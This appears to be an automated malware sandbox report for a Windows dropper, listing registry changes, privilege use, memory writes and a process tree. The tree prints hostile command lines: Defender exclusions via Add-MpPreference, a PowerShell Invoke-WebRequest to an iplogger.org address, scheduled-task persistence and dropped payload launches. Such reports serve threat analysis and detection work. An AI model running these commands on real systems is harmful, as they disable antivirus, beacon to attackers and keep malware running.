Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Process not Found -
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob installer.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob installer.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5428 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
5320 WerFault.exe
5320 WerFault.exe
5244 WerFault.exe
5244 WerFault.exe
5048 WerFault.exe
5048 WerFault.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
1260 Thu02d385ff55.exe
6128 gcleaner.exe
6128 gcleaner.exe
6096 vsvchNX79eSDzY6jf6F89_MI.exe
6096 vsvchNX79eSDzY6jf6F89_MI.exe
6120 4UFxWlf4SXw8gZe000f3mxr3.exe
6120 4UFxWlf4SXw8gZe000f3mxr3.exe
5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe
5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe
6136 vefp3cTczsHP35rf3STZwLUJ.exe
6136 vefp3cTczsHP35rf3STZwLUJ.exe
5564 byxb49tCEP1SdejWYr15WvcH.exe
5564 byxb49tCEP1SdejWYr15WvcH.exe
5112 2841347.scr
5112 2841347.scr
5396 210921.exe
5396 210921.exe
4892 powershell.exe
4892 powershell.exe
6024 269new.exe
6024 269new.exe
2028 WerFault.exe
2028 WerFault.exe
4432 AdvancedRun.exe
4432 AdvancedRun.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process
5112 2841347.scr
4588 E804.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 2548 Thu02c015332704.exe
Token: SeDebugPrivilege 4644 Thu02f60acc90a3.exe
Token: SeRestorePrivilege 5048 WerFault.exe
Token: SeBackupPrivilege 5048 WerFault.exe
Token: SeBackupPrivilege 5048 WerFault.exe
Token: SeCreateTokenPrivilege 5244 msiexec.exe
Token: SeAssignPrimaryTokenPrivilege 5244 msiexec.exe
Token: SeLockMemoryPrivilege 5244 msiexec.exe
Token: SeIncreaseQuotaPrivilege 5244 msiexec.exe
Token: SeMachineAccountPrivilege 5244 msiexec.exe
Token: SeTcbPrivilege 5244 msiexec.exe
Token: SeSecurityPrivilege 5244 msiexec.exe
Token: SeTakeOwnershipPrivilege 5244 msiexec.exe
Token: SeLoadDriverPrivilege 5244 msiexec.exe
Token: SeSystemProfilePrivilege 5244 msiexec.exe
Token: SeSystemtimePrivilege 5244 msiexec.exe
Token: SeProfSingleProcessPrivilege 5244 msiexec.exe
Token: SeIncBasePriorityPrivilege 5244 msiexec.exe
Token: SeCreatePagefilePrivilege 5244 msiexec.exe
Token: SeCreatePermanentPrivilege 5244 msiexec.exe
Token: SeBackupPrivilege 5244 msiexec.exe
Token: SeRestorePrivilege 5244 msiexec.exe
Token: SeShutdownPrivilege 5244 msiexec.exe
Token: SeDebugPrivilege 5244 msiexec.exe
Token: SeAuditPrivilege 5244 msiexec.exe
Token: SeSystemEnvironmentPrivilege 5244 msiexec.exe
Token: SeChangeNotifyPrivilege 5244 msiexec.exe
Token: SeRemoteShutdownPrivilege 5244 msiexec.exe
Token: SeUndockPrivilege 5244 msiexec.exe
Token: SeSyncAgentPrivilege 5244 msiexec.exe
Token: SeEnableDelegationPrivilege 5244 msiexec.exe
Token: SeManageVolumePrivilege 5244 msiexec.exe
Token: SeImpersonatePrivilege 5244 msiexec.exe
Token: SeCreateGlobalPrivilege 5244 msiexec.exe
Token: 31 5244 msiexec.exe
Token: 32 5244 msiexec.exe
Token: 33 5244 msiexec.exe
Token: 34 5244 msiexec.exe
Token: 35 5244 msiexec.exe
Token: SeDebugPrivilege 864 A5SgmahwE9hpMlGs6aKgdDtn.exe
Token: SeDebugPrivilege 1868 oKmnOrVPGDoDvSbzfd3Aw8I1.exe
Token: SeDebugPrivilege 4432 AdvancedRun.exe
Token: SeDebugPrivilege 4892 powershell.exe
Token: SeImpersonatePrivilege 4432 AdvancedRun.exe
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeTcbPrivilege 6000 svchost.exe
Token: SeTcbPrivilege 6000 svchost.exe
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
Token: SeShutdownPrivilege 3208 Process not Found
Token: SeCreatePagefilePrivilege 3208 Process not Found
-
Suspicious use of FindShellTrayWindow 12 IoCs
| PID | Process |
| --- | --- |
| 5400 | Riconobbe.exe.com |
| 5400 | Riconobbe.exe.com |
| 5400 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
| 16248 | installer.exe |
| 5324 | msedge.exe |
| 14864 | msiexec.exe |
| 14864 | msiexec.exe |
| 15464 | 5794.tmp |
| 6448 | main_signed1.tmp |
Suspicious use of SendNotifyMessage 6 IoCs
| PID | Process |
| --- | --- |
| 5400 | Riconobbe.exe.com |
| 5400 | Riconobbe.exe.com |
| 5400 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
| 5476 | Riconobbe.exe.com |
Suspicious use of SetWindowsHookEx 1 IoCs
| PID | Process |
| --- | --- |
| 5048 | jDVhr13u5N750xam3eOI1eNW.exe |
Suspicious use of UnmapMainImage 1 IoCs
| PID | Process |
| --- | --- |
| 3208 | Process not Found |
Suspicious use of WriteProcessMemory 64 IoCs
| Description | PID | Process | Target PID |
| --- | --- | --- | --- |
| PID 3932 wrote to memory of 4344 | 3932 | 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe | 78 |
| PID 3932 wrote to memory of 4344 | 3932 | 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe | 78 |
| PID 3932 wrote to memory of 4344 | 3932 | 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe | 78 |
| PID 4344 wrote to memory of 4588 | 4344 | setup_install.exe | 82 |
| PID 4344 wrote to memory of 4588 | 4344 | setup_install.exe | 82 |
| PID 4344 wrote to memory of 4588 | 4344 | setup_install.exe | 82 |
| PID 4344 wrote to memory of 4712 | 4344 | setup_install.exe | 83 |
| PID 4344 wrote to memory of 4712 | 4344 | setup_install.exe | 83 |
| PID 4344 wrote to memory of 4712 | 4344 | setup_install.exe | 83 |
| PID 4344 wrote to memory of 4252 | 4344 | setup_install.exe | 84 |
| PID 4344 wrote to memory of 4252 | 4344 | setup_install.exe | 84 |
| PID 4344 wrote to memory of 4252 | 4344 | setup_install.exe | 84 |
| PID 4344 wrote to memory of 4256 | 4344 | setup_install.exe | 85 |
| PID 4344 wrote to memory of 4256 | 4344 | setup_install.exe | 85 |
| PID 4344 wrote to memory of 4256 | 4344 | setup_install.exe | 85 |
| PID 4344 wrote to memory of 3012 | 4344 | setup_install.exe | 86 |
| PID 4344 wrote to memory of 3012 | 4344 | setup_install.exe | 86 |
| PID 4344 wrote to memory of 3012 | 4344 | setup_install.exe | 86 |
| PID 4344 wrote to memory of 5028 | 4344 | setup_install.exe | 87 |
| PID 4344 wrote to memory of 5028 | 4344 | setup_install.exe | 87 |
| PID 4344 wrote to memory of 5028 | 4344 | setup_install.exe | 87 |
| PID 4344 wrote to memory of 5044 | 4344 | setup_install.exe | 101 |
| PID 4344 wrote to memory of 5044 | 4344 | setup_install.exe | 101 |
| PID 4344 wrote to memory of 5044 | 4344 | setup_install.exe | 101 |
| PID 4344 wrote to memory of 4796 | 4344 | setup_install.exe | 88 |
| PID 4344 wrote to memory of 4796 | 4344 | setup_install.exe | 88 |
| PID 4344 wrote to memory of 4796 | 4344 | setup_install.exe | 88 |
| PID 4344 wrote to memory of 4892 | 4344 | setup_install.exe | 89 |
| PID 4344 wrote to memory of 4892 | 4344 | setup_install.exe | 89 |
| PID 4344 wrote to memory of 4892 | 4344 | setup_install.exe | 89 |
| PID 4256 wrote to memory of 3256 | 4256 | cmd.exe | 99 |
| PID 4256 wrote to memory of 3256 | 4256 | cmd.exe | 99 |
| PID 4344 wrote to memory of 868 | 4344 | setup_install.exe | 98 |
| PID 4344 wrote to memory of 868 | 4344 | setup_install.exe | 98 |
| PID 4344 wrote to memory of 868 | 4344 | setup_install.exe | 98 |
| PID 4712 wrote to memory of 784 | 4712 | cmd.exe | 90 |
| PID 4712 wrote to memory of 784 | 4712 | cmd.exe | 90 |
| PID 4712 wrote to memory of 784 | 4712 | cmd.exe | 90 |
| PID 4588 wrote to memory of 4380 | 4588 | cmd.exe | 97 |
| PID 4588 wrote to memory of 4380 | 4588 | cmd.exe | 97 |
| PID 4588 wrote to memory of 4380 | 4588 | cmd.exe | 97 |
| PID 4252 wrote to memory of 4544 | 4252 | cmd.exe | 96 |
| PID 4252 wrote to memory of 4544 | 4252 | cmd.exe | 96 |
| PID 4252 wrote to memory of 4544 | 4252 | cmd.exe | 96 |
| PID 5044 wrote to memory of 1260 | 5044 | cmd.exe | 95 |
| PID 5044 wrote to memory of 1260 | 5044 | cmd.exe | 95 |
| PID 5044 wrote to memory of 1260 | 5044 | cmd.exe | 95 |
| PID 3012 wrote to memory of 1288 | 3012 | cmd.exe | 92 |
| PID 3012 wrote to memory of 1288 | 3012 | cmd.exe | 92 |
| PID 3012 wrote to memory of 1288 | 3012 | cmd.exe | 92 |
| PID 5028 wrote to memory of 3872 | 5028 | cmd.exe | 91 |
| PID 5028 wrote to memory of 3872 | 5028 | cmd.exe | 91 |
| PID 5028 wrote to memory of 3872 | 5028 | cmd.exe | 91 |
| PID 4796 wrote to memory of 4644 | 4796 | cmd.exe | 93 |
| PID 4796 wrote to memory of 4644 | 4796 | cmd.exe | 93 |
| PID 868 wrote to memory of 2548 | 868 | cmd.exe | 100 |
| PID 868 wrote to memory of 2548 | 868 | cmd.exe | 100 |
| PID 4892 wrote to memory of 4652 | 4892 | cmd.exe | 94 |
| PID 4892 wrote to memory of 4652 | 4892 | cmd.exe | 94 |
| PID 4892 wrote to memory of 4652 | 4892 | cmd.exe | 94 |
| PID 784 wrote to memory of 4812 | 784 | Thu0247e977c7950492a.exe | 103 |
| PID 784 wrote to memory of 4812 | 784 | Thu0247e977c7950492a.exe | 103 |
| PID 784 wrote to memory of 4812 | 784 | Thu0247e977c7950492a.exe | 103 |
| PID 4652 wrote to memory of 3900 | 4652 | Thu02bfe1521bcc038.exe | 105 |
Processes

- PID 3932: C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - PID 4344: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\setup_install.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\setup_install.exe"
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - PID 4588: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      Signatures: Suspicious use of WriteProcessMemory
      - PID 4380: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    - PID 4712: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 784: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exe
        Command line: Thu0247e977c7950492a.exe
        Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
        - PID 4812: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exe" -a
          Signatures: Executes dropped EXE
    - PID 4252: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 4544: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0299d0d70a4d322.exe
        Command line: Thu0299d0d70a4d322.exe
        Signatures: Executes dropped EXE
        - PID 5244: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 240
          Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses
    - PID 4256: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 3256: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02483b39590da5492.exe
        Command line: Thu02483b39590da5492.exe
        Signatures: Executes dropped EXE
    - PID 3012: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 1288: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02966ca5c58f270.exe
        Command line: Thu02966ca5c58f270.exe
        Signatures: Executes dropped EXE
        - PID 5320: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 240
          Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses
    - PID 5028: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 3872: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02588bdad8e7.exe
        Command line: Thu02588bdad8e7.exe
        Signatures: Executes dropped EXE
        - PID 5048: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 316
          Signatures: Drops file in Windows directory; Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 4796: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 4644: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02f60acc90a3.exe
        Command line: Thu02f60acc90a3.exe
        Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - PID 4892: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 4652: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02bfe1521bcc038.exe
        Command line: Thu02bfe1521bcc038.exe
        Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of WriteProcessMemory
        - PID 3900: C:\Windows\SysWOW64\dllhost.exe
          Command line: dllhost.exe
        - PID 4604: C:\Windows\SysWOW64\cmd.exe
          Command line: cmd /c cmd < Del.doc
          - PID 5264: C:\Windows\SysWOW64\cmd.exe
            Command line: cmd
            - PID 5348: C:\Windows\SysWOW64\findstr.exe
              Command line: findstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc
            - PID 5400: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
              Command line: Riconobbe.exe.com H
              Signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
              - PID 5476: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com
                Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H
                Signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
            - PID 5428: C:\Windows\SysWOW64\PING.EXE
              Command line: ping YJTUIPJF -n 30
              Signatures: Runs ping.exe
    - PID 868: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02c015332704.exe
      Signatures: Suspicious use of WriteProcessMemory
      - PID 2548: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02c015332704.exe
        Command line: Thu02c015332704.exe
        Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - PID 5044: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Thu02d385ff55.exe
      Signatures: Suspicious use of WriteProcessMemory
- PID 4780: C:\Windows\System32\sihclient.exe
  Command line: C:\Windows\System32\sihclient.exe /cv lX+JvkxKV0GZd+6TsanO5Q.0.2
  Signatures: Modifies data under HKEY_USERS
- PID 1260: C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02d385ff55.exe
  Command line: Thu02d385ff55.exe
  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
  - PID 6028: C:\Users\Admin\Documents\3aKAj7M0ArmXRhDVn8m5SW6w.exe
    Command line: "C:\Users\Admin\Documents\3aKAj7M0ArmXRhDVn8m5SW6w.exe"
  - PID 6040: C:\Users\Admin\Documents\ROALiWFsQQ6znKzS1XQ1Yxhu.exe
    Command line: "C:\Users\Admin\Documents\ROALiWFsQQ6znKzS1XQ1Yxhu.exe"
    Signatures: Executes dropped EXE
    - PID 1488: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 268
      Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
  - PID 5156: C:\Users\Admin\Documents\8Fb4EkT85lFegSzJ2GCDrw_Z.exe
    Command line: "C:\Users\Admin\Documents\8Fb4EkT85lFegSzJ2GCDrw_Z.exe"
    Signatures: Executes dropped EXE
  - PID 4212: C:\Users\Admin\Documents\_Uqo5UP9ZDxv2KDF87j1qJ5Q.exe
    Command line: "C:\Users\Admin\Documents\_Uqo5UP9ZDxv2KDF87j1qJ5Q.exe"
    Signatures: Executes dropped EXE
    - PID 1280: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 268
      Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
  - PID 4708: C:\Users\Admin\Documents\CiDdAOtOAfGTjMtFrybZvGVz.exe
    Command line: "C:\Users\Admin\Documents\CiDdAOtOAfGTjMtFrybZvGVz.exe"
    Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger
  - PID 6136: C:\Users\Admin\Documents\vefp3cTczsHP35rf3STZwLUJ.exe
    Command line: "C:\Users\Admin\Documents\vefp3cTczsHP35rf3STZwLUJ.exe"
    Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
  - PID 6128: C:\Users\Admin\Documents\MRMOpxU_ONutwd6wjErAG8Yd.exe
    Command line: "C:\Users\Admin\Documents\MRMOpxU_ONutwd6wjErAG8Yd.exe"
  - PID 6120: C:\Users\Admin\Documents\4UFxWlf4SXw8gZe000f3mxr3.exe
    Command line: "C:\Users\Admin\Documents\4UFxWlf4SXw8gZe000f3mxr3.exe"
    Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
  - PID 6112: C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe
    Command line: "C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe"
    Signatures: Executes dropped EXE; Suspicious use of SetThreadContext
    - PID 6052: C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe
      Command line: C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe
      Signatures: Executes dropped EXE
  - PID 6104: C:\Users\Admin\Documents\8Ax8th0v3UP0xwWMPp2QiY_N.exe
    Command line: "C:\Users\Admin\Documents\8Ax8th0v3UP0xwWMPp2QiY_N.exe"
    Signatures: Executes dropped EXE
    - PID 2028: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 268
      Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses
  - PID 6096: C:\Users\Admin\Documents\rqsEP3YoLzx_NtJ6Aidq0odO.exe
    Command line: "C:\Users\Admin\Documents\rqsEP3YoLzx_NtJ6Aidq0odO.exe"
  - PID 6088: C:\Users\Admin\Documents\YCX7g7FDRa0n1vrcJtVZ_H9d.exe
    Command line: "C:\Users\Admin\Documents\YCX7g7FDRa0n1vrcJtVZ_H9d.exe"
    Signatures: Executes dropped EXE
    - PID 4932: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 288
      Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
  - PID 6080: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
    Command line: "C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe"
    Signatures: Executes dropped EXE; Suspicious use of SetThreadContext
    - PID 4688: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
      Command line: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
      Signatures: Executes dropped EXE
    - PID 1248: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
      Command line: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
    - PID 3952: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
      Command line: C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe
      Signatures: Executes dropped EXE
  - PID 864: C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe
    Command line: "C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"
    Signatures: Executes dropped EXE; Windows security modification; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken
    - PID 4432: C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\AdvancedRun.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - PID 5920: C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\test.bat"
    - PID 6176: C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe
      Command line: "C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"
    - PID 6164: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe" -Force
    - PID 6624: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 2388
      Signatures: Program crash
  - PID 4292: C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe
    Command line: "C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"
    Signatures: Executes dropped EXE; Suspicious use of SetThreadContext
    - PID 5112: C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe
      Command line: "C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"
  - PID 5048: C:\Users\Admin\Documents\jDVhr13u5N750xam3eOI1eNW.exe
    Command line: "C:\Users\Admin\Documents\jDVhr13u5N750xam3eOI1eNW.exe"
    Signatures: Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetWindowsHookEx
  - PID 4028: C:\Users\Admin\Documents\aclfGgw26YHyfrb3n9JONFow.exe
    Command line: "C:\Users\Admin\Documents\aclfGgw26YHyfrb3n9JONFow.exe"
    Signatures: Executes dropped EXE; Loads dropped DLL
    - PID 3080: C:\Windows\SysWOW64\cmd.exe
      Command line: "cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
      - PID 5396: C:\Users\Admin\AppData\Local\Temp\210921.exe
        Command line: "210921.exe"
        Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
      - PID 6024: C:\Users\Admin\AppData\Local\Temp\269new.exe
        Command line: "269new.exe"
        Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
      - PID 4892: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - PID 5544: C:\Users\Admin\Documents\PGyDws9ux3Lc9PjIedgVt2AC.exe
    Command line: "C:\Users\Admin\Documents\PGyDws9ux3Lc9PjIedgVt2AC.exe"
    Signatures: Executes dropped EXE; Drops file in Program Files directory
    - PID 6788: C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
      Signatures: Creates scheduled task(s)
    - PID 6780: C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
      Signatures: Creates scheduled task(s)
    - PID 6772: C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
      Command line: "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
      Signatures: Executes dropped EXE
